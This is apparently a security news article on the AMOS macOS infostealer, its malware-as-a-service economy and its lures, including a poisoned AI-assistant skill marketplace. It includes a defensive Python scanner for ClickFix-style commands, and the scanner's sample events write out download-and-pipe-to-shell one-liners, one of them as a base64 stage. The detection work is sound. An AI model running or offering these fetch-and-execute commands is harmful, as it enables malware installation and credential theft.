
AMOS Infostealer Targets macOS via Popular AI App

Summary

– Modern infostealers like AMOS are foundational data collection engines for a mature cybercrime economy, harvesting and selling digital identities to fuel fraud and further attacks.
– These campaigns rely heavily on adaptive social engineering, abusing trusted platforms, search engines, and AI software trends to trick users into executing the malware themselves.
– The AMOS infostealer operates as a Malware-as-a-Service, with developers, distributors, and log buyers forming a structured supply chain that industrializes infection and data monetization.
– Distributors drive campaign evolution using tactics like SEO poisoning, fake software installers, and abusing platforms like GitHub, ChatGPT, and AI agent marketplaces to disseminate the malware.
– Once executed, the stealer rapidly extracts credentials, sessions, and sensitive files from a victim’s system, creating logs that are sold as a commodity for account takeover and other criminal operations.

The digital threat landscape is increasingly dominated by a sophisticated cybercrime economy, with infostealer malware like AMOS acting as a primary engine for harvesting and selling stolen identities. These tools are far more than nuisance malware; they are data collection systems that feed a vast underground market. Credentials, financial information, and session cookies stolen by these programs are packaged and sold to other criminals, who then launch account takeovers, fraud, and further network intrusions. The effectiveness of these campaigns hinges on highly adaptive social engineering, where attackers constantly shift tactics to exploit new technology trends, trusted platforms, and popular software, including the latest AI applications, to deceive users into installing the malware themselves.

A recent report underscores the expanding impact of this identity exposure on enterprises. As a case study, the AMOS infostealer illustrates the operational model of this modern threat, evolving from its initial sightings to large-scale campaigns targeting specific user communities. Once executed on a victim’s Mac, this type of malware acts swiftly, scouring browsers, system credential stores, cryptocurrency wallets, and local files to extract and exfiltrate any valuable data it can find.

The most recent campaign, dubbed ClawHavoc, demonstrates this opportunistic adaptation. Attackers targeted the ecosystem of a popular personal AI assistant, poisoning its skill marketplace. They uploaded what appeared to be legitimate add-ons for tasks like cryptocurrency management or productivity. When users installed these skills, the hidden AMOS payload activated, stealing a wide array of sensitive information. This incident highlights how emerging AI agent platforms can become high-risk distribution channels if their marketplaces lack rigorous security vetting.

AMOS first emerged in mid-2023, advertised on Telegram channels with capabilities including password exfiltration from the macOS Keychain, browser session theft, and cryptocurrency wallet data harvesting. Sold as a monthly subscription paid in cryptocurrency, it quickly became a staple of the underground ecosystem. Threat actors now actively purchase “stealer logs”, the data packages output by AMOS and similar malware, as initial access for their own schemes, such as cryptocurrency wallet theft.

The methods for distributing AMOS are varied and cunning. Beyond traditional phishing emails and trojanized software installers, attackers have launched notable campaigns targeting specific groups. One operation focused on LastPass users, creating fraudulent GitHub repositories that impersonated over one hundred well-known software brands. Using search engine optimization (SEO) poisoning, attackers pushed these malicious repositories to the top of search results, leading victims to pages that socially engineered them into running terminal commands that downloaded the AMOS payload.

AI-driven hype has proven to be a particularly effective lure. Prior to the ClawHavoc campaign, attackers used OpenAI’s shared chat feature to host malicious installation guides on the official chatgpt.com domain. Victims reached these guides through paid search ads promoting a fake “ChatGPT Atlas browser for macOS,” and were again instructed to run a terminal command, effectively tricking them into executing the malware themselves.

More traditional distribution still plays a major role. Fake installers for popular software like Adobe Photoshop or Microsoft Office are common, often distributed through malvertising campaigns on platforms like Google Ads that lead to spoofed download sites. A growing tactic is the “ClickFix” method, where users are walked through a series of steps that end with them pasting a malicious command into the macOS Terminal themselves. This approach needs no software vulnerability at all: the victim fetches and runs the payload with their own privileges, and because it is pulled down by a shell command rather than opened as a downloaded application, Gatekeeper’s quarantine checks never see it.
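The GitHub, chatgpt.com and ClickFix lures described above all end the same way: the victim pastes a download-and-execute one-liner into Terminal. That common final step is what defenders can hunt for. The following is an added example, not code from the article or from any product it mentions: a small heuristic scanner that scores shell command lines taken from process-execution telemetry for the patterns such one-liners share (a fetch piped straight into a shell, an inline base64 stage, quarantine-attribute removal, inline osascript). The record field names (`ts`, `user`, `parent`, `cmdline`) and the sample events are constructed for the example, the IP addresses are from the documentation range, and the patterns are generic indicators rather than AMOS’s actual commands.

```python
"""Heuristic scanner for ClickFix-style "paste this into Terminal" one-liners.

Added example. Input records are dicts with the assumed fields
ts / user / parent / cmdline, as an EDR or osquery process-event export
might provide; adapt the field names to your telemetry.
"""
import base64
import json
import re
from typing import Dict, Iterable, List, Optional

# (rule name, regex over the whitespace-normalised command line, weight)
RULES = [
    ("curl_or_wget_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b"), 60),
    ("base64_decode_piped_to_shell",
     re.compile(r"base64\s+(-d|--decode|-D)[^|]*\|\s*(ba|z)?sh\b"), 50),
    ("echo_base64_decode",
     re.compile(r"\becho\b.+\|\s*base64\s+(-d|--decode|-D)"), 40),
    ("quarantine_removal",
     re.compile(r"xattr\s+(-r\s+)?-d\s+com\.apple\.quarantine"), 40),
    ("osascript_inline", re.compile(r"\bosascript\s+-e\b"), 30),
    ("ip_literal_url", re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}"), 25),
    ("download_to_tmp",
     re.compile(r"\b(curl|wget)\b.*(-o|-O|>)\s*/(tmp|var/tmp|private/tmp)/"), 20),
]

# Candidate base64 blobs: long runs of the base64 alphabet, optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_embedded_base64(cmd: str) -> Optional[str]:
    """Return the first embedded base64 token that decodes to printable UTF-8."""
    for tok in B64_TOKEN.findall(cmd):
        try:
            out = base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if out.isprintable():
            return out
    return None


def analyse(cmd: str) -> Dict[str, object]:
    """Score one command line; if it carries a base64 stage, score that too."""
    norm = " ".join(cmd.split())
    hits = [name for name, rx, _ in RULES if rx.search(norm)]
    score = sum(w for name, _, w in RULES if name in hits)
    decoded = None
    if any("base64" in h for h in hits):
        decoded = decode_embedded_base64(norm)
        if decoded:
            inner = [name for name, rx, _ in RULES if rx.search(decoded)]
            hits += ["decoded:" + h for h in inner]
            score += sum(w for name, _, w in RULES if name in inner)
    return {"score": score, "rules": hits, "decoded": decoded}


def scan_events(events: Iterable[dict], threshold: int = 50) -> List[dict]:
    """Return the events whose combined rule weight reaches the threshold."""
    findings = []
    for ev in events:
        cmd = ev.get("cmdline", "")
        res = analyse(cmd)
        if res["score"] >= threshold:
            findings.append({"ts": ev.get("ts"), "user": ev.get("user"),
                             "parent": ev.get("parent"), "cmdline": cmd, **res})
    return findings


def scan_jsonl(text: str, threshold: int = 50) -> List[dict]:
    """Convenience wrapper for a JSON-lines export."""
    return scan_events((json.loads(l) for l in text.splitlines() if l.strip()),
                       threshold)


# Constructed sample telemetry (not real logs). 203.0.113.0/24 is TEST-NET-3.
_STAGE2 = base64.b64encode(b"curl -s http://203.0.113.10/p | sh").decode()
SAMPLE_EVENTS = [
    {"ts": "2025-01-10T09:12:01Z", "user": "alice", "parent": "zsh",
     "cmdline": "brew install jq"},
    {"ts": "2025-01-10T09:13:44Z", "user": "alice", "parent": "zsh",
     "cmdline": "curl -fsSL https://203.0.113.10/atlas-installer.sh | bash"},
    {"ts": "2025-01-10T09:14:02Z", "user": "alice", "parent": "zsh",
     "cmdline": f"echo {_STAGE2} | base64 -d | sh"},
    {"ts": "2025-01-10T09:15:30Z", "user": "alice", "parent": "zsh",
     "cmdline": "xattr -d com.apple.quarantine ~/Downloads/Update.app"},
    {"ts": "2025-01-10T09:16:11Z", "user": "alice", "parent": "zsh",
     "cmdline": "git clone https://github.com/example/tool.git"},
    {"ts": "2025-01-10T09:17:05Z", "user": "alice", "parent": "zsh",
     "cmdline": "osascript -e 'beep 2'"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f["ts"], f["score"], f["rules"], f.get("decoded") or "")
```

With the default threshold only the two fetch-and-run commands are reported; the lone `xattr -d com.apple.quarantine` and the inline `osascript` stay below it because either is common in legitimate developer sessions on its own. Lowering the threshold to 40 surfaces the quarantine removal as well, which is a reasonable triage setting when the parent process is a terminal shell. The base64 stage is decoded and scored separately so the analyst sees the real second-stage command rather than an opaque blob.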

The business model behind AMOS is a textbook example of Malware-as-a-Service (MaaS). Developers maintain and lease the stealer platform to affiliates, who then handle distribution through their chosen social engineering channels. The stolen data logs are sold to specialized downstream criminals, such as access brokers or fraudsters, creating a multi-stage revenue pipeline. This industrialized model turns each infection into a commodity, with different actors specializing in development, distribution, and final monetization.

While the core malware capabilities evolve slowly, the distributors are the true innovators, constantly refining their psychological lures and choosing new targets. Their adaptability in abusing trusted platforms and trends, from AI tools to password managers, is what makes infostealers a persistent and scalable foundation for today’s cybercrime.

(Source: Bleeping Computer)
